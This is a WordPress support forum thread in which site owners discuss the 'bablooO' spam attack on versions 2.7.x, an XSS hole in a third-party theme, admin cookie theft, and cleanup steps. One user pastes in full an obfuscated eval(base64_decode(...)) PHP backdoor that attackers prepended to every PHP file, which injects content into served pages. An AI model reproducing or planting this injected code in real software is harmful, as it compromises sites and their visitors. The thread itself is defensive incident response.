bablooO/blyat attacks on WP 2.7.0 and 2.7.1

One of my sites is experiencing this as well, but the spam content is being injected into the RSS2 feed instead. I’ve upgraded to 2.8 and it still seems to be happening (unless it’s being cached somewhere). I have not seen any of this spam in the posts themselves.

Sterling, when you say “it still seems to be happening” do you mean that you’re seeing new spam content added even after you upgraded to 2.8?

I saw in your ckon comment that you have the spam in your posts as well as in your RSS feed, it’s just that it’s invisible unless you view source. That’s one of the characteristics of this attack.

As near as I can tell from the discussion on ckon, some people are finding the spam inserted in their theme files (particularly footer.php, and particularly people who have writable themes folders and use the theme editor) while others are seeing it inserted into blog posts in their database. It sounds like you’re in the latter category.

You can see the extent of the damage to your database by using the WP Export feature (built right into WP, under Tools) to save your content as an XML file. Then load the XML file into a text editor and see how many posts the spam content shows up in.

Checking for damage to your themes or other WP files is trickier unless you’re comfortable with command-line tools like grep. If you’re not a command-line person you could still FTP your theme files down to your desktop and examine them in a text editor.

Please let us know if you find anything that might be useful.

Correction: the content was in the posts in the database, but it was enclosed in a <p> element that was styled with height:0 and width:0, so I could only see it in the feed or with “view source”.

I changed my admin password and cleaned the affected posts.

Please notify me if/when you get more info on how this might have happened.

Just saw your response.

I’m not seeing any damage to theme files. It was only in the posts themselves. I suppose this has to be some sort of password security breach — either they hacked into my admin password or they found a way to get around the password permissions.

I have not seen any new spam content since I upgraded to 2.8 and changed the admin password. No other users have privileges beyond “Subscriber”.

I found one hole: a third-party theme wasn’t validating its arguments. I’ve confirmed that it was vulnerable to cross-site scripting (XSS) by appending javascript to a URL. Background:

https://codex.www.ads-software.com/Data_Validation
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

I added a line of input validation to the theme and sent the patch to the theme developers. Hole closed.

Now my burning question is whether that hole is the likely source of my intrusion or there are others. The symptoms we bablooO victims describe seem most consistent with an intruder being able to log into WordPress using the admin account. In practical terms is a javascript insertion in the URL really likely to result in interactive access to the WP Dashboard?

<? /**/eval(base64_decode… ?>

I found this code added to many of my files. I am uninstalling many of the sites now and going to older backups.

Almost all of my wordpress sites on the same server has been attacked with this.

Coolgeee, was this code in addition to the bablooO spam HTML or instead of it?

I am checking now.

But I do notice that almost all my file have this code added to the beginning of the files, like index.php, etc

example:
in the wp-app.php file here is the code: (it is in all the files!!!

<? /**/eval(base64_decode(‘aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb250ZW50L2cvbC9vL2dsb2JhbGJpendvcmtzL2h0bWwvaW5mb3JtZWRueS9UaGVtZXMvZGVmYXVsdC9pbWFnZXMvcG9zdC9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvY29udGVudC9nL2wvby9nbG9iYWxiaXp3b3Jrcy9odG1sL2luZm9ybWVkbnkvVGhlbWVzL2RlZmF1bHQvaW1hZ2VzL3Bvc3Qvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19’)); ?>

In practical terms is a javascript insertion in the URL really likely to result in interactive access to the WP Dashboard?

It’s possible. If they can get some javascript onto your page in a permanent fashion, then the next time you (the admin) visits the page, that script could send them your admin cookie, which would let them get into the site even though they lacked the password.

With the admin cookie, they effectively become the admin for a short period (until it expires). The first step would likely be an automated script injection, where they use the plugin or theme editor to inject php code into some file, giving them backdoor access. From there, they could do anything they want until you find and remove that code.

Mitigation: You can instantly invalidate all cookies to the site by changing the secret keys. See here for info on how to do that: https://www.ads-software.com/support/topic/170987

But I do notice that almost all my file have this code added to the beginning of the files, like index.php, etc

If that is the case, then it’s probable that they got in via a different means. I have often seen this occur on shared webhosting services with poor security between different customers.

In other words, if you’re sharing a server with 50 other sites, and any one of those other sites gets hacked, then the attacker can run a script to automatically add his hack code to all the sites on that server, unless the server is well-secured (many are not). Usually these scripts look for anything ending in PHP, for example, and just add the code to them blindly.

thanks

I will update any findings shortly

this is what my php.ini looks like:
register_globals = off
allow_url_fopen = off

expose_php = Off
max_input_time = 60
variables_order = “EGPCS”
extension_dir = ./
upload_tmp_dir = /tmp
precision = 12
SMTP = relay-hosting.secureserver.net
url_rewriter.tags = “a=href,area=href,frame=src,input=src,form=,fieldset=”

[Zend]
zend_extension=/usr/local/zo/ZendExtensionManager.so
zend_extension=/usr/local/zo/4_3/ZendOptimizer.so

does this look corrupt?

All these files aslos had added code to it.

wp-pass.php
wp-commentsrss2.php

my wp-pass.php:
<?php
/**
* Creates the password cookie and redirects back to where the
* visitor was before.
*
* @package WordPress
*/

/** Make sure that the WordPress bootstrap has ran before continuing. */
require( dirname(__FILE__) . ‘/wp-load.php’);

if ( get_magic_quotes_gpc() )
$_POST[‘post_password’] = stripslashes($_POST[‘post_password’]);

// 10 days
setcookie(‘wp-postpass_’ . COOKIEHASH, $_POST[‘post_password’], time() + 864000, COOKIEPATH);

wp_safe_redirect(wp_get_referer());
?>